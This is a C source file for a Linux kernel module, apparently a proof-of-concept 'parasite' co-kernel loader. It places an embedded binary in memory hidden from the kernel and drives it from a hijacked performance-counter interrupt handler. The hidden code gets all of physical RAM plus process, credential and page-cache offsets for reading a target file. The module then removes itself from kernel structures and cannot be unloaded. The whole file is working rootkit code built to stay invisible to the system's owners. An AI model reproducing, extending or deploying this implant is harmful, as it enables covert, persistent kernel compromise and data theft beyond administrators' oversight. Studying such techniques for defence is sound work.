/* SPDX-License-Identifier: GPL-2.0 */
/*
 * parasite_main.c — Co-kernel loader module
 *
 * This module orchestrates the complete co-kernel installation:
 *
 *   1. Allocate invisible memory (hidden from Linux direct map)
 *   2. Copy co-kernel binary into hidden pages
 *   3. Build standalone page tables for co-kernel's CR3
 *   4. Install PMI handler trampoline in IDT
 *   5. Configure PMU + LAPIC for hardware-driven periodic execution
 *   6. Hide the module from all kernel structures
 *
 * The module's init function runs in ~100ms, then the module
 * disappears from all introspection. The co-kernel continues
 * executing via hardware PMI interrupts.
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/string.h>
#include <linux/slab.h>
#include <linux/delay.h>
#include <linux/sched.h>
#include <linux/mm.h>
#include <linux/cred.h>
#include <linux/fs.h>
#include <linux/namei.h>
#include <linux/xarray.h>
#include <asm/io.h>
#include <asm/msr.h>

#include "../include/shared.h"
#include "memory.h"
#include "pagetable.h"
#include "execution.h"
#include "resolve.h"
#include "stealth.h"

MODULE_LICENSE("GPL");
MODULE_AUTHOR("CoKernel PoC");
MODULE_DESCRIPTION("Co-kernel parallel execution PoC");

/* V3: target file path for page cache reading */
static char *target_path = "/tmp/test";
module_param(target_path, charp, 0444);
MODULE_PARM_DESC(target_path, "Path of the file to read from page cache");

/*
 * The co-kernel binary is embedded in the module as a byte array.
 * It is generated by:
 *   xxd -i cokernel.bin > cokernel_blob.h
 */
#include "cokernel_blob.h"

/* External symbols from pmi_entry.S — used to measure trampoline size */
extern void component_pmi_entry(void);
extern void pmi_trampoline_end(void);
extern uint64_t trampoline_data[];

/*
 * Byte offsets into trampoline data block (see pmi_entry.S).
 * Mixed u64/u32 fields — use byte offsets, NOT array indices.
 */
#define TD_OFF_CR3            0    /* u64: co-kernel CR3 */
#define TD_OFF_STACK          8    /* u64: co-kernel stack top */
#define TD_OFF_TICK_FN        16   /* u64: component_tick VA */
#define TD_OFF_SAVED_RSP      24   /* u64: runtime scratch */
#define TD_OFF_SAVED_CR3      32   /* u64: runtime scratch */
#define TD_OFF_COUNTER_MSR    40   /* u32: MSR addr for counter */
#define TD_OFF_RELOAD_VAL     48   /* u64: counter reload value */
#define TD_OFF_OVF_CLEAR_MSR  56   /* u32: MSR for overflow clear */
#define TD_OFF_OVF_CLEAR_LO   60   /* u32: ovf clear value low */
#define TD_OFF_OVF_CLEAR_HI   64   /* u32: ovf clear value high */
#define TD_OFF_APIC_MODE      72   /* u32: 0=xAPIC, 1=x2APIC */

/* AMD Core Performance Counter MSRs */
#define AMD_MSR_PERF_CTR0     0xC0010201

/*
 * parasite_init — Module entry point.
 *
 * Executes the full installation sequence, then hides itself.
 * Returns 0 on success (module stays loaded but invisible).
 */
static int __init parasite_init(void)
{
    int ret;
    void *region;
    phys_addr_t phys_base;
    phys_addr_t comm_page_phys;
    struct ck_comm_page *comm;
    struct ck_bootstrap_data *bd;
    void *trampoline_va;
    phys_addr_t trampoline_phys;
    size_t trampoline_size;
    unsigned long init_task_addr;
    unsigned long *p_max_pfn;
    unsigned long ram_size;

    pr_info("cokernel: === Installation starting ===\n");

    /* ── Step 0: Bootstrap symbol resolver ─────────────────────── */
    ret = ck_resolve_init();
    if (ret) {
        pr_err("cokernel: symbol resolver init failed: %d\n", ret);
        return ret;
    }

    /* ── Step 1: Allocate invisible memory ─────────────────────── */
    pr_info("cokernel: [1/9] Allocating invisible memory...\n");

    ret = ck_alloc_invisible_memory();
    if (ret) {
        pr_err("cokernel: memory allocation failed: %d\n", ret);
        return ret;
    }

    phys_base = ck_get_phys_base();
    comm_page_phys = ck_get_comm_page_phys();
    pr_info("cokernel: physical base = 0x%llx\n",
            (unsigned long long)phys_base);
    pr_info("cokernel: comm page phys = 0x%llx\n",
            (unsigned long long)comm_page_phys);

    /* Allocate trampoline page (stays in Linux direct map) */
    ret = ck_alloc_trampoline_page();
    if (ret) {
        pr_err("cokernel: trampoline alloc failed: %d\n", ret);
        return ret;
    }

    trampoline_va = ck_get_trampoline_va();
    trampoline_phys = ck_get_trampoline_phys();

    /* Make trampoline page executable (direct map is NX by default) */
    {
        typedef int (*set_memory_x_t)(unsigned long addr, int numpages);
        set_memory_x_t fn_set_memory_x;
        fn_set_memory_x = (set_memory_x_t)ck_resolve_symbol("set_memory_x");
        if (fn_set_memory_x) {
            ret = fn_set_memory_x((unsigned long)trampoline_va, 1);
            if (ret)
                pr_warn("cokernel: set_memory_x failed: %d\n", ret);
            else
                pr_info("cokernel: trampoline page marked executable\n");
        } else {
            pr_warn("cokernel: set_memory_x not found, NX may cause fault\n");
        }
    }

    /* Get temporary mapping for setup operations */
    region = ck_get_temp_mapping();
    if (!region) {
        pr_err("cokernel: temp mapping failed\n");
        return -ENOMEM;
    }

    /* ── Step 2: Copy co-kernel binary ─────────────────────────── */
    pr_info("cokernel: [2/9] Copying co-kernel binary (%u bytes)...\n",
            cokernel_bin_len);

    if (cokernel_bin_len > COKERNEL_TEXT_SIZE + COKERNEL_DATA_SIZE) {
        pr_err("cokernel: binary too large (%u > %lu)\n",
               cokernel_bin_len,
               COKERNEL_TEXT_SIZE + COKERNEL_DATA_SIZE);
        ck_remove_temp_mapping();
        return -E2BIG;
    }

    memcpy(region + COKERNEL_TEXT_OFFSET, cokernel_bin, cokernel_bin_len);
    pr_info("cokernel: binary copied to region offset 0x%lx\n",
            COKERNEL_TEXT_OFFSET);

    /* ── Step 3: Initialize communication page ─────────────────── */
    pr_info("cokernel: [3/9] Initializing communication page...\n");

    comm = (struct ck_comm_page *)(region + COKERNEL_COMM_OFFSET);
    memset(comm, 0, sizeof(*comm));
    comm->status = 0;   /* init */

    /* ── Step 4: Resolve symbols and write bootstrap data ──────── */
    pr_info("cokernel: [4/9] Resolving symbols, writing bootstrap data...\n");

    init_task_addr = ck_resolve_symbol("init_task");
    if (!init_task_addr) {
        pr_err("cokernel: failed to resolve init_task\n");
        ck_remove_temp_mapping();
        return -ENOENT;
    }
    pr_info("cokernel: init_task VA = 0x%lx\n", init_task_addr);

    p_max_pfn = (unsigned long *)ck_resolve_symbol("max_pfn");
    if (!p_max_pfn) {
        pr_err("cokernel: failed to resolve max_pfn\n");
        ck_remove_temp_mapping();
        return -ENOENT;
    }
    ram_size = (*p_max_pfn) * PAGE_SIZE;
    pr_info("cokernel: max_pfn = %lu, ram_size = %lu MB\n",
            *p_max_pfn, ram_size / (1024 * 1024));

    bd = (struct ck_bootstrap_data *)(region + COKERNEL_DATA_OFFSET);
    bd->magic           = COKERNEL_BOOTSTRAP_MAGIC;
    bd->init_task_dm    = LINUX_DIRECT_MAP_BASE +
                          virt_to_phys((void *)init_task_addr);
    bd->ram_size        = ram_size;
    bd->self_phys_base  = phys_base;
    bd->direct_map_base = LINUX_DIRECT_MAP_BASE;
    bd->comm_page_va    = COKERNEL_VIRT_BASE + COKERNEL_COMM_OFFSET;
    bd->comm_page_phys  = comm_page_phys;
    bd->offset_task_comm = offsetof(struct task_struct, comm);

    /* V2: task_struct traversal offsets */
    bd->offset_tasks     = offsetof(struct task_struct, tasks);
    bd->offset_pid       = offsetof(struct task_struct, pid);
    bd->offset_tgid      = offsetof(struct task_struct, tgid);
    bd->offset_real_cred = offsetof(struct task_struct, real_cred);
    bd->offset_cred_uid  = offsetof(struct cred, uid);

    /* V3: page cache reading offsets */
    {
        struct path fpath;
        int path_ret = kern_path(target_path, LOOKUP_FOLLOW, &fpath);
        if (path_ret == 0) {
            struct inode *target_inode = d_inode(fpath.dentry);
            bd->target_inode_dm = LINUX_DIRECT_MAP_BASE +
                                  virt_to_phys(target_inode);
            pr_info("cokernel: target file '%s' → inode_dm = 0x%llx\n",
                    target_path, bd->target_inode_dm);
            path_put(&fpath);
        } else {
            bd->target_inode_dm = 0;
            pr_warn("cokernel: target file '%s' not found (err=%d)\n",
                    target_path, path_ret);
        }
    }
    bd->offset_i_mapping     = offsetof(struct inode, i_mapping);
    bd->offset_i_size        = offsetof(struct inode, i_size);
    bd->offset_a_i_pages     = offsetof(struct address_space, i_pages);
    bd->offset_xa_head        = offsetof(struct xarray, xa_head);
    bd->offset_xa_node_slots  = offsetof(struct xa_node, slots);
    bd->vmemmap_base          = (uint64_t)(unsigned long)pfn_to_page(0);
    bd->sizeof_struct_page    = (uint64_t)sizeof(struct page);

    pr_info("cokernel: bootstrap_data written at DATA offset 0x%lx\n",
            COKERNEL_DATA_OFFSET);
    pr_info("cokernel:   init_task_dm    = 0x%llx\n", bd->init_task_dm);
    pr_info("cokernel:   offset_task_comm = %llu\n", bd->offset_task_comm);
    pr_info("cokernel:   offset_tasks     = %llu\n", bd->offset_tasks);
    pr_info("cokernel:   offset_pid       = %llu\n", bd->offset_pid);
    pr_info("cokernel:   offset_real_cred = %llu\n", bd->offset_real_cred);
    pr_info("cokernel:   offset_cred_uid  = %llu\n", bd->offset_cred_uid);
    pr_info("cokernel:   offset_i_mapping = %llu\n", bd->offset_i_mapping);
    pr_info("cokernel:   offset_i_size    = %llu\n", bd->offset_i_size);
    pr_info("cokernel:   offset_a_i_pages = %llu\n", bd->offset_a_i_pages);
    pr_info("cokernel:   offset_xa_head   = %llu\n", bd->offset_xa_head);
    pr_info("cokernel:   offset_xa_node_slots = %llu\n", bd->offset_xa_node_slots);
    pr_info("cokernel:   vmemmap_base     = 0x%llx\n", bd->vmemmap_base);
    pr_info("cokernel:   sizeof_struct_page = %llu\n", bd->sizeof_struct_page);

    /* ── Step 5: Build co-kernel page tables ───────────────────── */
    pr_info("cokernel: [5/9] Building page tables...\n");

    ret = ck_build_pagetables(region, phys_base, COKERNEL_TOTAL_SIZE,
                              trampoline_va, trampoline_phys);
    if (ret) {
        pr_err("cokernel: page table construction failed: %d\n", ret);
        ck_remove_temp_mapping();
        return ret;
    }

    /* ── Step 6: Map Linux physical RAM into co-kernel CR3 ─────── */
    pr_info("cokernel: [6/9] Mapping physical RAM (%lu MB)...\n",
            ram_size / (1024 * 1024));

    ret = ck_map_linux_physmem(ram_size, trampoline_phys);
    if (ret) {
        pr_err("cokernel: physmem mapping failed: %d\n", ret);
        ck_remove_temp_mapping();
        return ret;
    }

    /* ── Step 7: Set up PMI trampoline and execution ───────────── */
    pr_info("cokernel: [7/9] Configuring PMI execution...\n");

    /* Detect CPU vendor + APIC mode early — needed for trampoline patching */
    ck_detect_cpu_features();

    /*
     * Copy the PMI trampoline assembly to the dedicated page.
     * This page is in Linux's direct map AND mapped in the
     * co-kernel's page tables at the same VA.
     */
    trampoline_size = (unsigned long)&pmi_trampoline_end -
                      (unsigned long)&component_pmi_entry;

    if (trampoline_size > PAGE_SIZE) {
        pr_err("cokernel: trampoline too large (%zu > %lu)\n",
               trampoline_size, PAGE_SIZE);
        ck_remove_temp_mapping();
        return -E2BIG;
    }

    memcpy(trampoline_va, (void *)&component_pmi_entry, trampoline_size);
    pr_info("cokernel: trampoline copied (%zu bytes) to %px\n",
            trampoline_size, trampoline_va);

    /*
     * Patch the data block in the trampoline copy.
     * Use byte offsets — the block has mixed u64/u32 fields.
     */
    {
        unsigned long data_offset = (unsigned long)&trampoline_data -
                                    (unsigned long)&component_pmi_entry;
        void *td_base = trampoline_va + data_offset;

        /* Core fields (same as V0) */
        *(uint64_t *)(td_base + TD_OFF_CR3)       = ck_get_pgd_phys();
        *(uint64_t *)(td_base + TD_OFF_STACK)      = COKERNEL_VIRT_BASE + COKERNEL_STACK_TOP;
        *(uint64_t *)(td_base + TD_OFF_TICK_FN)    = COKERNEL_VIRT_BASE + COKERNEL_TEXT_OFFSET;
        *(uint64_t *)(td_base + TD_OFF_SAVED_RSP)  = 0;
        *(uint64_t *)(td_base + TD_OFF_SAVED_CR3)  = 0;

        /* PMU counter reload (AMD or Intel) */
        if (ck_get_is_amd()) {
            *(uint32_t *)(td_base + TD_OFF_COUNTER_MSR) = AMD_MSR_PERF_CTR0;
            *(uint64_t *)(td_base + TD_OFF_RELOAD_VAL)  = PMI_RELOAD_VALUE;
            /* AMD doesn't use global overflow clear */
            *(uint32_t *)(td_base + TD_OFF_OVF_CLEAR_MSR) = 0;
        } else {
            *(uint32_t *)(td_base + TD_OFF_COUNTER_MSR)   = 0x309; /* IA32_FIXED_CTR0 */
            *(uint64_t *)(td_base + TD_OFF_RELOAD_VAL)     = PMI_RELOAD_VALUE;
            *(uint32_t *)(td_base + TD_OFF_OVF_CLEAR_MSR)  = 0x390; /* PERF_GLOBAL_STATUS_RESET */
            *(uint32_t *)(td_base + TD_OFF_OVF_CLEAR_LO)   = 0;
            *(uint32_t *)(td_base + TD_OFF_OVF_CLEAR_HI)   = 1; /* bit 32 */
        }

        /* APIC mode */
        *(uint32_t *)(td_base + TD_OFF_APIC_MODE) = ck_get_is_x2apic() ? 1 : 0;

        pr_info("cokernel: patched trampoline data:\n");
        pr_info("cokernel:   CR3       = 0x%llx\n", *(uint64_t *)(td_base + TD_OFF_CR3));
        pr_info("cokernel:   stack_top = 0x%llx\n", *(uint64_t *)(td_base + TD_OFF_STACK));
        pr_info("cokernel:   tick_fn   = 0x%llx\n", *(uint64_t *)(td_base + TD_OFF_TICK_FN));
        pr_info("cokernel:   counter   = MSR 0x%x\n", *(uint32_t *)(td_base + TD_OFF_COUNTER_MSR));
        pr_info("cokernel:   apic_mode = %s\n", ck_get_is_x2apic() ? "x2APIC" : "xAPIC");
    }

    /* Set up PMI: install IDT handler + configure PMU + LAPIC */
    ret = ck_setup_pmi_execution(trampoline_va);
    if (ret) {
        pr_err("cokernel: PMI setup failed: %d\n", ret);
        ck_remove_temp_mapping();
        return ret;
    }

    /* ── Diagnostic: verify PMI fires ──────────────────────────── */
    {
        volatile struct ck_comm_page *diag_comm;
        uint64_t ctr_val;

        /* Read back counter to verify it was programmed */
        if (ck_get_is_amd()) {
            rdmsrl(AMD_MSR_PERF_CTR0, ctr_val);
            pr_info("cokernel: [diag] AMD PerfCtr0 readback = 0x%llx\n", ctr_val);
        } else {
            rdmsrl(MSR_IA32_FIXED_CTR0, ctr_val);
            pr_info("cokernel: [diag] Intel FIXED_CTR0 readback = 0x%llx\n", ctr_val);
        }

        /* Wait 200ms — should be enough for many PMI ticks */
        msleep(200);

        /* Check if co-kernel wrote to comm page */
        diag_comm = (volatile struct ck_comm_page *)
            phys_to_virt(comm_page_phys);
        pr_info("cokernel: [diag] comm_page magic=0x%llx tick_count=%llu\n",
                diag_comm->magic, diag_comm->tick_count);

        /* Re-read counter to see if it progressed */
        if (ck_get_is_amd()) {
            rdmsrl(AMD_MSR_PERF_CTR0, ctr_val);
            pr_info("cokernel: [diag] after 200ms: AMD PerfCtr0=0x%llx\n", ctr_val);
        } else {
            rdmsrl(MSR_IA32_FIXED_CTR0, ctr_val);
            pr_info("cokernel: [diag] after 200ms: Intel FIXED_CTR0=0x%llx\n", ctr_val);
        }
    }

    /* ── Step 8: Remove temp mapping ───────────────────────────── */
    pr_info("cokernel: [8/9] Removing temp mapping...\n");
    ck_remove_temp_mapping();

    /* ── Step 9: Hide module ───────────────────────────────────── */
    pr_info("cokernel: [9/9] Going stealth...\n");

    /*
     * Brief delay to let any pending printk buffers flush.
     * After hiding, our printk calls won't identify us.
     */
    msleep(50);

    /* Hide the module from all kernel structures */
    ck_hide_module();

    pr_info("cokernel: === Installation complete ===\n");
    pr_info("cokernel: PMI firing every %llu cycles on vector 0x%02x\n",
            PMI_INTERVAL, PMI_VECTOR);
    pr_info("cokernel: comm_page_phys=0x%llx\n",
            (unsigned long long)comm_page_phys);

    return 0;  /* Module stays loaded but invisible */
}

/*
 * No exit function — the module can never be unloaded since it's
 * hidden from the module list. This is intentional.
 */
static void __exit parasite_exit(void)
{
    /* This will never be called */
    pr_info("cokernel: exit (should never happen)\n");
}

module_init(parasite_init);
module_exit(parasite_exit);
